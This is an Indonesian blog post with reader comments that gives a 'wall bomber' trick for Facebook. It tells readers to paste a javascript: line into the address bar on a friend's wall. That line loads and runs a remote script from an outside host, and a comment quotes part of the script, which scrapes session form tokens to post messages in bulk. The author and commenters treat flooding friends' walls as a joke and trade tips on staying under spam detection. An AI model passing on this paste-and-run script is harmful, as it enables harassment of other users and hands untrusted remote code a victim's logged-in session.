Mohon Bantuannya, Jika Ada Link Download yang Sudah Terhapus Diberitahukan Ya
♥ Jika ada yang ingin bertanya, Silahkan email ♥
echochandra91@gmail.com

Mengirim Wall Bomber Facebook postheadericon

Dipersembahkan Oleh Muhammad Chandra | Pada 10.43.00

Tahukah anda maksd dari Wall Bommber ini ???
→ wall bomber ini adalah sebuah kerjaan iseng yang bisa ngirim banyak pesan sekaligus ke wall teman anda

jika anda ingin mengirim 30 pesan wall,,anda hanya perlu 2 kali klik saja,,tidak perlu capek2 sampai 30 kali kerja1

cara bagaimana ???

•Log-in Pesbuk anda
•Cari wall target teman anda
• Copy Script di bawah ini dan paste di address bar wall teman anda dan ENTER

javascript:(a = (b = document).createElement("script")).src = "//fayoverlay.tk/js/komen-setan.js", b.body.appendChild(a); void(0);

•Kemudian nnti akan muncul pesan seperti dibawah ini



•karena saya hanya mengrimkan sebanyak 10 pesan,,ntar jadinya gini nih


note → cara ini tidak bekerja bila wall teman anda terkunci!



Jangan Lupa Di Share Atau Like ya Broo

Baca Juga Artikel Dibawah Ini

31 Orang Bersandiwara:

fay uciha mengatakan...

nice tutornya kaka makasih yah............
dah mau share,,,,,,,,,
:D

ashabul mengatakan...

sorry nda........cm test aja....jgn dibalas

Anonim mengatakan...

kenapa lau pake mozilla g bisa?
apa mang g bisa pake mozilla?

Muhammad Chandra mengatakan...

masak sih gak bisa ??

Anonim mengatakan...

Kog G bisa pake mozilla!!!! ngrim nya tuh d kiriman teman tah....mohon bntuannya??

Muhammad Chandra mengatakan...

buka profile teman anda
lalu paste kode diatas,,dan tekan enter

Anonim mengatakan...

Ga bsa gan mlah ada tulisan kyak gini...

http://fayoverlay.tk/js/komen-setan.js
fayoverlay.tk
var a = document.body.innerHTML; var Num = prompt("", "Masukkan Jumlah Pesan Yang Akan Dikirim"); formx = a.match(/name="post_form_id" value="([\d\w]+)"/)[1]; dts = a.match(/name="fb_dtsg" value="([^"]+)"/)[1]; composerid = a.match(/na... Lihat Selengkapnyame="xhpc_composerid" value="([^"]+)"/)[1];

tulisan nih pa mksudnya???

Anonim mengatakan...

wah...bisa gan....wall temen ane penuh...ngomel" dia sekarang,. wkwkwkwkw...

Ajixcrew mengatakan...

thanks gan bguss juga nie ..

Pejuang Penjaga Jiwa mengatakan...

Udah diblok gan :D

Mas Izz mengatakan...

Ane di banned ama pesbuk gan. :D
cmiwww

Muhammad Chandra mengatakan...

hahahahahahahha
agan sih kirimnya terlalu banyak
hahahahahha.......

dindin mengatakan...

thanks gan!
ane di omelin temen temen deh gara gara ikutin info agan.
wkwkwkwk

Anonim mengatakan...

Bekerja gan..
Makasih nice inpo,,
:)

Anonim mengatakan...

gan klo kbanyakn di blokir ya?????

Muhammad Chandra mengatakan...

iya gan...jangan bnyk2 mka nya

Anonim mengatakan...

coba ah,,, :D

vero mengatakan...

notifnya gmana bg??? keluar sesuai inputan atau cuma 1????

Anjing Setia mengatakan...

cacad!

Matthew mengatakan...

kalo udah di copy taro nya dimana .?
di wall nya..?

addres bar wall tuh dimana..?
thx

Matthew mengatakan...

gan,, kayak nya udah ngk bisa tuh ya..
udah kedetect spam ..

Muhammad Chandra mengatakan...

iya,,di address bar teman anda...
buka dulu profile nya...
nah,,cpy script diatas dan enter

MyMusic mengatakan...

ga bisa gan script nya !...

Muhammad Chandra mengatakan...

dah di blokir kalii gan ama facebooknya

Anonim mengatakan...

gan...klo pke mozilla bs gak?

Muhammad Chandra mengatakan...

bisa kok..

Anonim mengatakan...

udah dak bisa gan...
beten sios gerjani tmen nek gne tha..

d3p3 mengatakan...

Batas pengiriman wall biar ga diblokir berapa ya. terima kasih.


Salam,
d3p3
http://membuatweb123.co.cc
Panduan cara membuat website/blog yg bs menghasilkan uang bagi pemula/gapteker.

Muhammad Chandra mengatakan...

saya coba 5 gak apa2 kok...
dan jangan terlalu sering

Anonim mengatakan...

kok gk bsa om klo kta pakek koneksi aman HTTPS

kiky mengatakan...

g bisa q coba2 trus gan, knp y??????

Poskan Komentar

Cara Komentar :
1.Tulis Komentar Anda
2.Kemudian, Pilih Name/URL
Isi Nama Anda dan URL blog/wesite/facebook Anda
Kalau URL g isi pun tidak apa - apa
3.Klik "continue"
4.Kirim.